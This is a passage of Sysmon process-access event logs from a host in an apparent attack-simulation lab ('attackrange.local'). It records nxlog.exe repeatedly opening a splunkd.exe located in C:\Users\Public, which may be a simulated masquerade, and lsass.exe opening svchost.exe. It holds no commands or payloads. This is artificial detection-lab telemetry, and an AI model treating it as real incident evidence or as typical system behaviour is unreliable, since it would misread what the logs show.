(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4679,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:52.520\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:52.520","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4680,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:53.520\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:53.520","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4681,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:54.520\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:54.520","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4682,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.520\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.520","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4683,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4684,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4685,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 